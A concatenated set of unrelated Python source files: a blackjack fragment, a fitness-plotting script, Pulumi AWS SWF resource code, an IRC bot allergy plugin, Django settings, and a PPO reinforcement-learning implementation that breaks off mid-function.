main_jugador = sample(lista_cartas, 2)
score_jugador = sum(cartas[carta] for carta in main_jugador)
print("Te han tocado las cartas: {} {} , y su puntuación es {}.".format(main_jugador[0],
main_jugador[1],
score_jugador))
main_banca = sample(lista_cartas, 2)
score_banca = sum(cartas[carta] for carta in main_banca)
print("La banca tiene las cartas: {} {} , y su puntuación es {}.".format(main_banca[0],
main_banca[1],
score_banca)) |
py | 1a33107a9abe95f460b53de4b29ba66db6c9e249 | import csv
import os
#import pandas as pd
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#import scipy.stats as stats
def main():
test_dir = "length_500"
data = get_data(test_dir)
plot_aggregate_over_time(data, "schaffer", test_dir)
plot_stddev_over_time(data, "schaffer", test_dir)
plot_average_final_fitness(data, "schaffer", test_dir)
#plot_single_run_over_time(data[data.keys()[0]]["1"]["average_experienced"], test_dir)
#print data.keys()[0]
def get_data(common_dir):
data = {}
for d in os.listdir(common_dir):
if not os.path.isdir(common_dir + "/" + d):
continue
dir_name_list = d.split("/")[-1].split("_")
idnum = dir_name_list[-1]
config = "_".join(dir_name_list[:-1])
if config in data:
data[config][idnum] = {}
else:
data[config] = {}
data[config][idnum] = {}
with open(common_dir+"/"+d+"/correlation.dat") as infile:
data[config][idnum]["correlation"] = float(infile.readline())
data[config][idnum]["average_experienced"] = import_csv(common_dir+"/"+d+"/experienced_fitnesses.csv")
data[config][idnum]["average_reference"] = import_csv(common_dir+"/"+d+"/reference_fitnesses.csv")
#data[config][idnum]["best_experienced"] = import_csv(common_dir+"/"+d+"/experienced_best_fitnesses.csv")
#data[config][idnum]["best_reference"] = import_csv(common_dir+"/"+d+"/reference_best_fitnesses.csv")
return data
def import_csv(file_name):
with open(file_name, "rb") as csvfile:
csv_reader = csv.reader(csvfile)
data = []
data.append(csv_reader.next())
#print(data)
for row in csv_reader:
#print(row)
data.append([float(i) for i in row])
return data
def plot_single_run_over_time(single_run_data, directory):
    plt.clf()
plt.plot(single_run_data["Generation"], np.log(single_run_data["Average_Fitness"]))
plt.savefig(directory+"/single_run_over_time.png")
def plot_aggregate_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][1])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
logs = [np.log(s[i]+add_factor) for s in series]
averages.append(sum(logs)/float(len(logs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/runs_over_time_"+key+"_2500gen.png")
def plot_stddev_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][2])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
devs = [s[i] for s in series]
averages.append(sum(devs)/float(len(devs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/diversity_over_time_"+key+"_2500gen.png")
def plot_average_final_fitness(data, key=None, directory="."):
plt.clf()
corrs = []
finals = []
for config in data:
if key == None or key in config:
for run in data[config]:
corrs.append(data[config][run]["correlation"])
add_factor=0
if "rana" in config:
add_factor = 20000
finals.append(add_factor+float(data[config][run]["average_reference"][-1][1]))
#finals.append(float(data[config][run]["best_reference"]["Best_fitness"][-1:]))
plt.plot(corrs, np.log(finals), ".")
plt.xlabel("Correlation")
plt.ylabel("Average Fitness")
plt.savefig(directory+"/correlation_vs_final_fitness_scatter_"+key+".png")
if __name__ == "__main__":
main()
|
py | 1a3310a4feb307379b973f73e43c2195b5d19b61 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
workflow_execution_retention_period_in_days: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
"""
pulumi.set(__self__, "workflow_execution_retention_period_in_days", workflow_execution_retention_period_in_days)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if name_prefix is not None:
pulumi.set(__self__, "name_prefix", name_prefix)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> pulumi.Input[str]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
@workflow_execution_retention_period_in_days.setter
def workflow_execution_retention_period_in_days(self, value: pulumi.Input[str]):
pulumi.set(self, "workflow_execution_retention_period_in_days", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@name_prefix.setter
def name_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name_prefix", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if name_prefix is not None:
pulumi.set(__self__, "name_prefix", name_prefix)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if workflow_execution_retention_period_in_days is not None:
pulumi.set(__self__, "workflow_execution_retention_period_in_days", workflow_execution_retention_period_in_days)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@name_prefix.setter
def name_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name_prefix", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> Optional[pulumi.Input[str]]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
@workflow_execution_retention_period_in_days.setter
def workflow_execution_retention_period_in_days(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workflow_execution_retention_period_in_days", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an SWF Domain resource.
## Example Usage
To register a basic SWF domain:
```python
import pulumi
import pulumi_aws as aws
foo = aws.swf.Domain("foo",
description="SWF Domain",
workflow_execution_retention_period_in_days="30")
```
## Import
SWF Domains can be imported using the `name`, e.g.
```sh
$ pulumi import aws:swf/domain:Domain foo test-domain
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an SWF Domain resource.
## Example Usage
To register a basic SWF domain:
```python
import pulumi
import pulumi_aws as aws
foo = aws.swf.Domain("foo",
description="SWF Domain",
workflow_execution_retention_period_in_days="30")
```
## Import
SWF Domains can be imported using the `name`, e.g.
```sh
$ pulumi import aws:swf/domain:Domain foo test-domain
```
:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["name_prefix"] = name_prefix
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if workflow_execution_retention_period_in_days is None and not opts.urn:
raise TypeError("Missing required property 'workflow_execution_retention_period_in_days'")
__props__.__dict__["workflow_execution_retention_period_in_days"] = workflow_execution_retention_period_in_days
__props__.__dict__["arn"] = None
super(Domain, __self__).__init__(
'aws:swf/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["arn"] = arn
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["name_prefix"] = name_prefix
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["workflow_execution_retention_period_in_days"] = workflow_execution_retention_period_in_days
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> pulumi.Output[Optional[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> pulumi.Output[str]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
|
py | 1a33117c9f83cc2a7bae91e27af7584770db29ba | # Copyright 2015 Jason Meridth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pyhole Allergies Plugin"""
import datetime
from pyhole.core import plugin
from pyhole.core import utils
class Allergies(plugin.Plugin):
"""Provide access to current allergy data."""
@plugin.hook_add_command("allergies")
@utils.spawn
def allergies(self, message, params=None, **kwargs):
"""Display current allergies in San Antonio, TX (ex: .allergies)."""
d = datetime.datetime.now()
weekend = d.isoweekday() in (6, 7)
if weekend:
message.dispatch("Unable to fetch allergy data on weekends.")
return
today = d.strftime("%Y-%m-%d")
url = "http://saallergy.info/day/%s" % today
headers = {"accept": "application/json"}
response = utils.fetch_url(url, headers=headers)
if response.status_code != 200:
return
data = response.json()
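        # Response shape inferred from the parsing below; the sample values are illustrative only:
        # {"results": [{"allergen": "Mold", "level": "Low", "count": "400"}, ...]}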
text = "Allergies for %s: " % today
for a in data["results"]:
text = text + "%s - %s (%s) | " % (a["allergen"], a["level"],
a["count"])
        text = text.rstrip(" |")
message.dispatch(text)
@plugin.hook_add_command("pollen")
def alias_pollen(self, message, params=None, **kwargs):
"""Alias of allergies."""
self.allergies(message, params, **kwargs)
|
py | 1a3312375f5cf618a552ed07da27a18f74b2f20f | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.9.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv('DJANGO_SECRET_KEY')
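# Note: os.getenv returns None when DJANGO_SECRET_KEY is unset, and Django refuses to
# start with an empty SECRET_KEY (ImproperlyConfigured), so export the variable first,
# e.g. `export DJANGO_SECRET_KEY=...`.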
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Los_Angeles'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
py | 1a33131158cee63b2541c0655a10df647a2304f6 | """
To run the code for each problem, simply run the 'runP#.py' file.
So for this problem, run runP3.py
The P#classes.py files are very similar across problems,
but each includes a scaling which is (roughly) optimized for that specific problem.
The runP#.py file will automatically import the necessary classes from the appropriate location.
"""
import torch
import torch.nn as nn
from torch.distributions import Normal
import cv2
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1, n_latent_var_c2):
super(ActorCritic, self).__init__()
# actor
self.action_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_a1),
nn.ReLU(),
nn.Linear(n_latent_var_a1, n_latent_var_a2),
nn.ReLU(),
nn.Linear(n_latent_var_a2, action_dim)
)
# critic
self.value_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_c1),
nn.ReLU(),
nn.Linear(n_latent_var_c1, n_latent_var_c2),
nn.ReLU(),
nn.Linear(n_latent_var_c2, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = dist.sample()
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
        return action.detach().cpu().numpy()  # .cpu() so this also works when the policy runs on a GPU
def act_deterministic(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = action_probs
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
        return action.detach().cpu().numpy()  # .cpu() so this also works when the policy runs on a GPU
def evaluate(self, state, action, std_scale):
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_value = self.value_layer(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
def film_stochastic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
def film_deterministic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act_deterministic(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
class PPO:
def __init__(self, environment, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1,
n_latent_var_c2, lr, gamma, K_epochs, eps_clip, entropy_beta, critic_coef):
self.environment = environment
self.lr = lr
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.entropy_beta = entropy_beta
self.critic_coef = critic_coef
self.policy = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr)
self.policy_old = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def update(self, memory, std_scale):
# I found that for my implementation, using this form of the rollouts worked best
disc_reward = 0
rewards_bin = []
# We begin with the latest rewards, and work backwards
for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
if is_terminal:
disc_reward = 0
disc_reward = (disc_reward * self.gamma) + reward
# Insert backwards, since we 'reversed' above.
rewards_bin.insert(0, disc_reward)
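        # For example (illustrative values only), with gamma = 0.99 and a single episode
        # whose rewards were [1, 0, 2], the loop above yields the discounted returns
        # [1 + 0.99*(0 + 0.99*2), 0 + 0.99*2, 2] = [2.9602, 1.98, 2].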
rewards = torch.tensor(rewards_bin).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# Must convert lists to tensors
old_logprobs = torch.stack(memory.logprobs).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_states = torch.stack(memory.states).to(device).detach()
# Now we optimize the policy
for _ in range(self.K_epochs):
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions, std_scale=std_scale)
# First we find the ratio of the probabilities of selecting action a_t, given state s_t, under
# the new and old policies, respectively.
# We can use the log to make this more computationally efficient.
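            # exp(log pi_new(a|s) - log pi_old(a|s)) equals pi_new(a|s) / pi_old(a|s), the PPO importance ratio r_t(theta).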
newold_ratio = torch.exp(logprobs - old_logprobs.detach())
            # Subtract the state-values from the rewards to get the advantages.
advantages = rewards - state_values.detach()
# Reshape this
newold_ratio = newold_ratio.view(2, -1)
target1 = newold_ratio * advantages
# In pytorch, 'clamp' is how we clip.
target2 = torch.clamp(newold_ratio, 1 - self.eps_clip, 1 + self.eps_clip)
target3 = target2 * advantages
# We need to isolate out the third term to reshape it appropriately
entropy = self.entropy_beta * dist_entropy
entropy = entropy.view(2, -1)
actor_loss = -torch.min(target1, target3)
critic_loss = self.critic_coef * self.MseLoss(state_values, rewards)
# Now we have our total loss
